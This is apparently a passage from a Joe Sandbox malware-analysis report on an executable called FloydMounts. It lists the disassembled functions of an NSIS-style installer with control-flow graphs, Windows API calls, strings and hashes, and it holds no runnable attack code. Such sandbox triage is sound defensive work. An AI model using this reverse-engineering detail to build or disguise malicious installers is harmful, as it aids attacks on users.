                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 3282139019-0
                                                                                              • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                              • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                              • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                              • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                              Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                              APIs
                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                              • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                              • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                              • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                              • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                              • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                              • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                              • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                              • API String ID: 608394941-2746725676
                                                                                              • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                              • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                              • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                              • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                              Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              • lstrcatW.KERNEL32(00000000,00000000,TallAppeal,004D70B0,00000000,00000000), ref: 00401A76
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,TallAppeal,TallAppeal,00000000,00000000,TallAppeal,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
                                                                                                • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
                                                                                                • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
                                                                                                • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                              • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TallAppeal
                                                                                              • API String ID: 4286501637-1779690085
                                                                                              • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                              • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                              • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                              • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                                              Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004035C4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                              Strings
                                                                                              • Inst, xrefs: 00403698
                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                              • Error launching installer, xrefs: 00403603
                                                                                              • Null, xrefs: 004036AA
                                                                                              • soft, xrefs: 004036A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                              • API String ID: 4283519449-527102705
                                                                                              • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                              • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                              • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                              • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C
                                                                                              Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 654 40337f-403398 655 4033a1-4033a9 654->655 656 40339a 654->656 657 4033b2-4033b7 655->657 658 4033ab 655->658 656->655 659 4033c7-4033d4 call 403336 657->659 660 4033b9-4033c2 call 403368 657->660 658->657 664 4033d6 659->664 665 4033de-4033e5 659->665 660->659 666 4033d8-4033d9 664->666 667 403546-403548 665->667 668 4033eb-403432 GetTickCount 665->668 671 403567-40356b 666->671 669 40354a-40354d 667->669 670 4035ac-4035af 667->670 672 403564 668->672 673 403438-403440 668->673 674 403552-40355b call 403336 669->674 675 40354f 669->675 676 4035b1 670->676 677 40356e-403574 670->677 672->671 678 403442 673->678 679 403445-403453 call 403336 673->679 674->664 687 403561 674->687 675->674 676->672 682 403576 677->682 683 403579-403587 call 403336 677->683 678->679 679->664 688 403455-40345e 679->688 682->683 683->664 691 40358d-40359f WriteFile 683->691 687->672 690 403464-403484 call 4076a0 688->690 697 403538-40353a 690->697 698 40348a-40349d GetTickCount 690->698 693 4035a1-4035a4 691->693 694 40353f-403541 691->694 693->694 696 4035a6-4035a9 693->696 694->666 696->670 697->666 699 4034e8-4034ec 698->699 700 40349f-4034a7 698->700 701 40352d-403530 699->701 702 4034ee-4034f1 699->702 703 4034a9-4034ad 700->703 704 4034af-4034e0 MulDiv wsprintfW call 404f9e 700->704 701->673 708 403536 701->708 706 403513-40351e 702->706 707 4034f3-403507 WriteFile 702->707 703->699 703->704 709 4034e5 704->709 711 403521-403525 706->711 707->694 710 403509-40350c 707->710 708->672 709->699 710->694 712 40350e-403511 710->712 711->690 713 40352b 711->713 712->711 713->672
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004033F1
                                                                                              • GetTickCount.KERNEL32 ref: 00403492
                                                                                              • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                              • wsprintfW.USER32 ref: 004034CE
                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00424579,00403792,00000000), ref: 004034FF
                                                                                              • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileTickWrite$wsprintf
                                                                                              • String ID: (]C$... %d%%$pAB$yEB
                                                                                              • API String ID: 651206458-486274953
                                                                                              • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                              • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                              • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                              • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9
                                                                                              Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(00445D80,00424579,74DF23A0,00000000), ref: 00404FD6
                                                                                              • lstrlenW.KERNEL32(004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FE6
                                                                                              • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,74DF23A0,00000000), ref: 00404FF9
                                                                                              • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2740478559-0
                                                                                              • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                              • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                              • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                              • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                              Function 00401EB9 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 78COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 729 401eb9-401ec4 730 401f24-401f26 729->730 731 401ec6-401ec9 729->731 732 401f53-401f69 GlobalAlloc call 406831 730->732 733 401f28-401f2a 730->733 734 401ed5-401ee3 call 4062cf 731->734 735 401ecb-401ecf 731->735 745 401f6e-401f7b 732->745 736 401f3c-401f4e call 406035 733->736 737 401f2c-401f36 call 4062cf 733->737 747 401ee4-402702 call 406831 734->747 735->731 738 401ed1-401ed3 735->738 751 402387-40238d GlobalFree 736->751 737->736 738->734 742 401ef7-402e50 call 406035 * 3 738->742 750 4030e3-4030f2 742->750 745->750 745->751 762 402708-40270e 747->762 751->750 762->750
                                                                                              APIs
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • GlobalFree.KERNEL32(00716D68), ref: 00402387
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeGloballstrcpyn
                                                                                              • String ID: Exch: stack < %d elements$Pop: stack empty$TallAppeal$hmq
                                                                                              • API String ID: 1459762280-3104231033
                                                                                              • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                              • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                              • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                              • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                              Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 764 402713-40273b call 406035 * 2 769 402746-402749 764->769 770 40273d-402743 call 40145c 764->770 772 402755-402758 769->772 773 40274b-402752 call 40145c 769->773 770->769 776 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 772->776 777 40275a-402761 call 40145c 772->777 773->772 777->776
                                                                                              APIs
                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662975407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662957220.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663004750.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663022273.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1663336351.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_FloydMounts.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringWritelstrcpyn
                                                                                              • String ID: <RM>$TallAppeal$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                              • API String ID: 247603264-870748736
                                                                                              • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                              • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                              • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                              • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                              Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 785 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 796 402223-4030f2 call 4062cf 785->796 797 40220d-40221b call 4062cf 785->797 797->796
                                                                                              APIs
